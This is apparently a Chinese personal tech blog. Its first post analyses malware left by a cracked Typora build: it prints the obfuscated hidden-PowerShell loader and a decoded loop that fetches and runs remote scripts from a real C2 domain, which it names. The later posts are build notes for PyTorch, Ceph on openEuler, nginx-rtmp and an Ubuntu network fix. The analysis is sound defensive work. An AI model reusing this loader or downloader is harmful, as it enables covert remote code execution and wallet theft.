没想到互联网老司机也有翻车的一天= =

前几天贪小便宜，发现typora的beta版本过期了，于是去一个平常十分信任的网站找了份破解版，然后就翻车了T T

起因是今天在编译东西的时候，管理观察任务管理器的时候发现多出一个powershell进程。因为平常不怎么用powershell，所以看到这进程还是十分敏感的，就右键看了一下等待链。结果不看不知道，一看吓一跳，分析结果说进程正在等待网络IO。当场就觉得不对劲了，用powershell执行本地程序还情有可原，这年头还会有哪家公司用powershell来做网络通信，大概率就是个人开发者了。

为了摸清楚这个powershell进程到底在干嘛，最为直观的信息就是它的调用链了。作为脚本语言，最大的好处就是其源代码往往具有一定可读性，对于伪装级别不高的脚本来说，摸到脚本本身大概就能知道它在干嘛了。

然而，切出任务管理器一看，命令行长这样：

PoWerShELl -wINDOWstYle hidDEN

一股浓浓的黑客风味扑面而来——虽然cmd和powershell允许大小写混用，但一般人为了可读性，哪会整得这样花里胡哨的？

伪装的还算好，脚本和参数可能通过管道传送，没有出现在命令行里，但这编程风格还是露出了鸡脚。怎么哪里都有小黑子（逃

接下来要做的就是顺藤摸瓜，找到究竟是谁调用的这个脚本，再把背后的真实脚本挖出来。这里用wmic命令来寻找应用的调用关系（https://stackoverflow.com/questions/7486717/finding-parent-process-id-on-windows）：

wmic process where (processid=PROCID_HERE) get parentprocessid

凭着pid一路顺藤摸瓜，找到了svchost.exe，右键转到服务一看，发现是计划任务。

然后来到控制面板中的计划任务，选到左边导航栏最顶部的元素任务计划程序（本地），再从菜单栏里的操作选择显示所有正在运行的任务。不消多看，为数不多的运行中任务里，只有一个任务名是奇奇怪怪的字符串，对应的命令是一个光秃秃的cmd.exe。

扒出来一看，完整的命令行长这样：

cmd.exe /C eCHo IeX "Icm ([SCRiPtbLoCk]::cREatE([sTriNg]::jOin('', ((geT-iTeMprOPeRTY -paTh 'HKlM:\SoftwaRe\KITwaREU5OEj').'u5oejUf' | % { [ChaR](`$_ -bXOr 236) }))))" | PoWerShELl -wINDOWstYle hidDEN

只能说味儿更浓了。

然后简单解释一下这串命令干了啥：从注册表取HKlM:\SoftwaRe\KITwaREU5OEj\u5oejUf项的值，逐字节与数236做异或操作（简单的字符串解码），然后做一个没什么鸟用的空字符串拼接，再包裹为一个可执行脚本块，然后使用icm（Invoke-Command）、iex（Invoke-Expression）命令让powershell执行这个代码段。最后为了隐藏这段代码，使用cmd的echo功能转化到管道输出，再通过管道拼接直接将脚本输入到新创建的powershell进程中；powershell进程再通过-WindowStyle hidden参数设置为无窗口后台运行。通过这个方式，完整地掩盖了要运行的真是脚本——我们到现在还不知道黑客打算执行什么。

在前面顺着pid找调用进程的时候，找到cmd.exe的时候是能看到这串命令的。因为恰好正在用cmake编译，当时还楞了一下，cmake原来还会调用powershell脚本的么= =

接下来就是解密真实脚本的过程了，大致工作就是从上面的cmd命令中，把到执行powershell脚本之前的一段截取出来，让他输出到命令行即可，在此就不展开讲了。（其中很怪的一点是，echo命令里用了`字符来保护$字符，但我印象中cmd的保护字符是^来着？）

结果在这里贴一下吧：

while ($true) {
  try {
        foreach ($c in (@("com", "xyz"))) {
            foreach ($a in (@("wmail", "fairu", "bideo", "privatproxy", "ahoravideo"))) {
                foreach ($b in (@("endpoint", "blog", "chat", "cdn", "schnellvpn"))) {
                    try {
                        $h = "$(-join ((97..122) | Get-Random -Count (Get-Random -Minimum 5 -Maximum 10) | % {[char]$_})).com";
                        $r = Invoke-RestMethod -Uri "http://$a-$b.$c/v2/B723B9C0-2A79-4F4D-9F9D-4DED94453BFB?v=newcounter2" -TimeoutSec 30 -Headers @{ Host = $h }
                        if ($r -ne '') {
                            sTaRt-jOb ([sCriptBlock]::Create($r)) | Wait-Job -Timeout 7200
                            break;
                        }
                    }
                    catch {
                    }
                }
            }
        }
    }
    catch {
    }
    Start-Sleep -Seconds 5;
}

这脚本写的还挺鸡贼，powershell解码出来一行只有一个字符，光是整理成可读格式都花了我不小功夫。

在脚本里面，黑客又做了一个2x10x10=200个网站的排列组合，每5秒钟访问一个，其中藏了一个真实的网站，访问后可以得到一段脚本，作者让他等脚本执行2小时，然后重新开始这个循环。

下下来看了一下，tnnd，这鸟人在系统里搜索区块链钱包，然后上传个人信息给服务器，怕是偷钱去了。还好不玩区块链。

对了，域名是bideo-cdn.xyz，有兴趣的可以自己下来看看。

老版pytorch配新版编译器会出现一些奇怪的问题，在这里记录一下。

1. Could not find libuv_tmp_LIBRARY using the following names: uv, libuv

libuv是做分布式异步io用的，咱们Windows单机用不到这个，通过设置环境变量USE_DISTRIBUTED=0跳过这一问题。

2. algorithm(7417): error C2678: binary '*': no operator found which takes a left-hand operand of type 'const _BidIt' (or there is no acceptable conversion) [pytorch\build\caffe2\torch_cpu.vcxproj]

这个是mkl-dnn的问题，参考这个issue。

解决方法：升级mkl-dnn到1.7版本，或在aten/src/ATen/native/CompositeRandomAccessorCommon.h文件的第132行，在

reference operator*() {

处添加const关键字，修改为

reference operator*() const {

再重新执行编译指令即可。

3. pytorch\caffe2\utils\math_gpu.cu(898): error : namespace "thrust" has no member "host_vector" [pytorch\build\caffe2\torch_cuda.vcxproj]

这个是CUDA的问题，恰好是11.4版本引入的，参考这个issue。

解决方法：在caffe2/utils/math_gpu.cu文件头部添加头文件引用：

#include <thrust/host_vector.h>

然后重新编译即可。

好耶，是红帽系的openEuler

dnf groupinstall -y "Development Tools"

# 下载源代码
git clone https://github.com/ceph/ceph
cd ceph
git checkout quincy-release
git submodule update --init --recursive

# 编译前准备
# openEuler 22.03的源里没有这两个python包，需要改为手动下载
sed -i -E 's/(.*asyncssh$)/#\1/gm' ceph.spec.in
sed -i -E 's/(.*natsort$)/#\1/gm' ceph.spec.in

# 官方还没有加openEuler的选项，但大概率是兼容的
sed -i -e 's/centos|fedora/centos|openEuler|fedora/g' install-deps.sh

./install-deps.sh

# 装完依赖之后再装dnf里没有的两个包
pip3 install asyncssh natsort

dnf install -y xmlsec1 doxygen ninja-build python3-sphinx
dnf install -y libibverbs-devel openldap-devel lz4-devel expat-devel lttng-ust-devel libbabeltrace-devel libatomic librabbitmq-devel librdkafka-devel java-1.8.0-openjdk-devel

# cmake配置
./do_cmake.sh -DCMAKE_BUILD_TYPE=RelWithDebInfo

# 开始编译
ninja

打RPM包的过程有点曲折，openEuler的维护者不知道在干些什么，去维护ceph.spec而不是ceph.spec.in，搞得我不知道版本更新的时候到底该对着谁的spec改了。。

这里就不理openEuler自己公布的spec文件了，用点取巧的方法，伪装成CentOS试试。

# 制作RPM源码包
./make_srpm.sh

# 展开RPM源码包用于安装
# 注意默认是解压到家目录下的，所以在ceph目录下执行完可能发现没任何变化，回家目录检查下肯定有rpmbuild文件夹了
rpm -i ceph-17.2.5-0.g98318ae89f1.src.rpm

# 安装编译依赖
dnf builddep -y --define 'rhel 7' --spec ~/rpmbuild/SPECS/ceph.spec

# 华子的像素级抄袭功底还是在的，包管理器名字都给你改喽
# 说实话还整个大小写混用让人挺不舒服的。。
sed -i -e 's/^BuildRequires:  redhat-rpm-config$/BuildRequires:  (redhat-rpm-config or openEuler-rpm-config)/gm' ~/rpmbuild/SPECS/ceph.spec
sed -i -E 'N;s/(^%if 0%\{\?rhel} == 8$)(\n%py_byte_compile.*)/\1 || 0%{?openEuler}\2/gm' ~/rpmbuild/SPECS/ceph.spec

# RPM编译
# openEuler上的cmake可执行文件是python脚本，然而很怪，一用rpmbuild，python就会掉PYTHONPATH，找不到cmake
# 伪装成rhel7，走centos的编译流程，但是又绕过软件包版本限制
PYTHONPATH=/usr/local/lib64/python3.9/site-packages rpmbuild -ba ~/rpmbuild/SPECS/ceph.spec --define 'rhel 7'

将编译的ceph RPM包作为repo提供给其他机器使用，参考：https://blog.csdn.net/DeamonXiao/article/details/120879577

dnf install -y createrepo
cd ~/rpmbuild/RPMS
createrepo .

然后另外单独起个后台进程，直接用http提供服务；这里用7000端口，根据需要可以自己调。

python3 -m http.server 7000

至此，一个repo就建立好了。

然后配置服务器使用这个源：

cat << EOF > /etc/yum.repos.d/Ceph-dev.repo
[ceph-dev]
name=Ceph Dev
baseurl=http://<ip-address>:7000/
enabled=1
gpgcheck=0
EOF

# 更新缓存，测试源是否添加成功
dnf makecache

苦逼兼职运维的第六年，已经无力吐槽Ubuntu了= =

症状：在nmtui里激活网卡，提示Could not activate connection: XXX because device is strictly unmanaged.

懒人解决方案：

sudo su -c 'echo ",except:type:ethernet" >> /usr/lib/NetworkManager/conf.d/10-globally-managed-devices.conf'
sudo service network-manager restart

原因大致是Ubuntu的NetworkManager默认将以太网卡设置为了不管理模式，因而无法通过nmtui对以太网卡进行开关操作，即使配置了网络设置也不管用。而上面这段except则是反向操作，告诉NetworkManager不要不管理以太网卡。

咕果上翻了半天没找到合适的解决方案，感谢这位知乎网友：https://zhuanlan.zhihu.com/p/514966896

最近突然又想玩本地推流了，转来转去发现还是nginx做推流服务器比较舒服（开源且稍微熟悉一点），考虑到之前试过的别人编译的nginx 1.7.11.3 Gryphon过于老旧，而且卡顿严重，就打算自己编译一份。在这里简单记录一下编译流程。

仔细观察nginx官方提供的windows编译版，发现提供的还是32位程序，而在实际编译中也的确发现部分模块存在32位和64位混编导致失败的情况，因而最好用VS自带的x64_x86环境（Native Tools Command Prompt）启动cmd来尽可能避免编译出错。都什么年代了，还在用传统x86

set PATH=%PATH%;C:\msys64\usr\bin

pacman --noconfirm -S nasm

git clone https://github.com/nginx/nginx
git clone https://github.com/arut/nginx-rtmp-module

cd nginx
mkdir deps

cd deps
git clone https://github.com/PCRE2Project/pcre2
git clone https://github.com/madler/zlib
git clone https://github.com/openssl/openssl

cd ..

bash ./auto/configure --with-cc=cl --with-cpp=cl --with-cc-opt='/MP /wd4456' --with-pcre=deps/pcre2 --prefix= --sbin-path=nginx.exe --with-zlib=deps/zlib --with-openssl=deps/openssl --with-http_stub_status_module --add-module=../nginx-rtmp-module

nmake

编译完把nginx.exe复制到项目根目录下即可使用。

还是不要尝试nmake install了，不然会报出各种奇奇怪怪的错误= =